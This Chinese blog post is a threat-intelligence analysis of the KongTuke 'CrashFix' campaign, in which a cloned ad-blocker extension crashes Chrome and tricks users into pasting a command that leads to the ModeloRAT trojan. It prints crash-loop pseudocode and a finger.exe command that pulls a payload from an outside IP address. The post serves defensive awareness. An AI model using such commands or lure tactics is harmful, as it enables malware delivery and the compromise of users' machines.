文章总结： 本文复盘了KongTuke攻击活动，黑客利用Chrome扩展NexShield实施CrashFix攻击，通过十亿次循环导致浏览器崩溃，诱导用户手动执行伪造的安全修复命令。攻击者利用Finger.exe进行LotL绕过防火墙，并经环境感知确认域环境后投放ModeloRAT木马。建议警惕剪贴板投毒与诱导性弹窗，封禁Finger协议并审查浏览器插件。 综合评分： 89 文章分类： 恶意软件,威胁情报,社会工程学,红队,终端安全

复盘 KongTuke 攻击链：从浏览器死锁到内网穿透，ModeloRAT 是如何潜入域环境的？

原创

Kit Chung Kit Chung

安全圈动向

2026年1月21日 07:55 广东

大家好，做技术的兄弟们，谁浏览器里没装过几个去广告插件（AdBlocker）？毕竟满屏弹窗真的让人血压升高。但如果我告诉你，你千辛万苦在 Chrome 官方商店 找到的高分“去广告神器”，不仅是假的，而且会故意写死循环把你的浏览器搞崩，只为了诱导你亲手给黑客开后门，你敢信？

最近，Huntress 团队披露了一个代号为 KongTuke 的攻击活动，他们把这种新型手法命名为 CrashFix。

这不仅仅是一次简单的恶意软件投毒，这是一场技术与心理学的顶级博弈。今天就来拆解一下这背后的硬核技术。

01 “官方认证”的信任陷阱

这次的主角是一个叫 “NexShield” 的扩展程序。

但这群名为 KongTuke 的黑客非常鸡贼，他们没有从零写代码，而是直接克隆了知名开源插件 uBlock Origin Lite 的代码。这意味着它的功能看起来非常“正常”，甚至真的能去广告。这也是为什么它能通过谷歌的安全审查，堂而皇之地在 Chrome Web Store 上架，并骗取了 5000+ 的下载量。

但在代码深处，黑客埋下了一个“定时炸弹”。这个插件有一个非常猥琐的潜伏机制：安装后的前 60 分钟，它人畜无害。一旦过了一小时，猎杀开始。

02 暴力美学：用 10 亿次循环制造崩溃

这是整个攻击链中最精彩，也最令技术人咋舌的部分。

大多数恶意软件都想悄悄运行（FUD），生怕被用户发现。但 CrashFix 反其道而行之，它就是要搞出大动静。它的核心逻辑是一个针对浏览器的 DoS（拒绝服务）攻击。

技术原理拆解：

当触发条件满足（潜伏期结束 + UUID存在），插件会启动一个死循环。这不是普通的 while(true)，它会疯狂创建运行时端口连接（runtime port connections）。

根据逆向分析，代码中设置了一个高达 10亿次（1 billion iterations） 的循环步骤！

// 伪代码逻辑示意for&nbsp;(let&nbsp;i =&nbsp;0; i <&nbsp;1_000_000_000; i++) { &nbsp; &nbsp;&nbsp; &nbsp; chrome.runtime.connect(...);&nbsp;// 疯狂建立连接}

这种资源耗尽型攻击（Resource Exhaustion）会瞬间吃光内存，导致 Chrome 变卡、无响应，最后直接崩溃（Crash）。

为什么要这么做？ 为了制造恐慌。当用户发现浏览器崩了，强制重启后，插件会利用 localStorage 里的标记，立刻弹出一个伪造的“微软官方安全警告”，告诉你是 Edge 或者 Chrome 检测到了威胁，才导致刚才的崩溃。

这时候，用户的心态是脆弱的，急于解决问题。于是，黑客给出了“解决方案”。

03 剪贴板投毒与上古神器 Finger.exe

弹窗会引导用户点击一个“修复”按钮。这里的技术本质是 ClickFix 诱饵的升级版。当你点击“修复”时，其实是将一段恶意的 PowerShell 命令复制到了你的剪贴板。

接着，弹窗贴心地指示你： “请按 Win + R 打开运行窗口，粘贴（Ctrl+V），然后回车。”

你看，黑客没有利用任何复杂的 RCE 漏洞，没有 0-day，全靠社会工程学。

Finger.exe 的骚操作

如果你照做了，执行的第一阶段命令竟然调用了 Windows 自带的一个上古命令：finger.exe。

很多年轻的工程师可能都没听过这个命令。Finger 协议最初是用来查询远程用户信息的，但在现代网络中几乎绝迹。黑客之所以用它，是因为：

• Living off the Land (LotL)：

  它在 Windows 中默认存在，无需下载。

• 绕过防火墙：

  很多企业的安全策略会忽略这个冷门协议的流量。

命令长这样：

finger&nbsp;<恶意载荷>@199.217.98.108

04 终极杀器：ModeloRAT 的环境感知

载荷落地后，并没有急着破坏，而是先做了一次极其严格的环境感知。

脚本会解密出一堆 Base64 和 XOR 混淆的代码，然后检查当前环境：

1. 是否有 50 多种分析工具（如 Wireshark, IDA Pro）在运行？
2. 最关键的一点：当前机器是否加入了域？

黑客的目标非常明确：他们只想要企业内网的高价值目标。

• 如果是个人电脑：

  服务器只返回一个 TEST PAYLOAD!!!!，伤害性不大，侮辱性极强，说明这部分还在测试阶段。

• 如果是企业域环境：

  真正的恶魔 ModeloRAT 登场了。

ModeloRAT 技术细节：

这是一个全功能的 Python 编写的 RAT（远程访问木马），针对 Windows 平台。

• 加密通信：

  使用 RC4 算法加密 C2 通信。

• 智能信标（Beaconing）：

  平时每 300 秒（5分钟）心跳一次。

• 避险模式：

  这是个亮点。如果连续 6 次连接失败，它会判断可能被防火墙拦截或网络异常，自动将心跳间隔拉长到 900 秒（15分钟），以“装死”来逃避检测。

总结与建议

KongTuke 的这波 CrashFix 攻击，给我们敲响了警钟。现在的黑客不再单纯依赖硬核的代码漏洞，而是将代码攻击（DoS崩溃）与心理攻击（虚假修复引导）结合到了极致。

给各位 IT 同行的防范建议：

1. 警惕“剪贴板投毒” 任何网页、弹窗让你打开 Win+R 并粘贴内容的，100% 是诈骗，没有任何例外。

2. 封禁 Finger 协议 在企业防火墙和 EDR 策略中，如果没有业务需求，建议直接封禁 finger.exe 的出站流量。这玩意儿正经人用得少，黑客用得欢。

3. 插件瘦身 尽量减少浏览器插件的数量，即使是官方商店下载的，也要看清开发者和近期评论。

技术在进步，黑客的骗术也在升级。只有不仅懂技术，更懂“人性”，我们才能守住安全的底线。

• End –

觉得这篇文章硬核？

欢迎点赞、在看、转发三连，这是我持续输出的动力！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全圈动向 Kit Chung Kit Chung《复盘 KongTuke 攻击链：从浏览器死锁到内网穿透，ModeloRAT 是如何潜入域环境的？》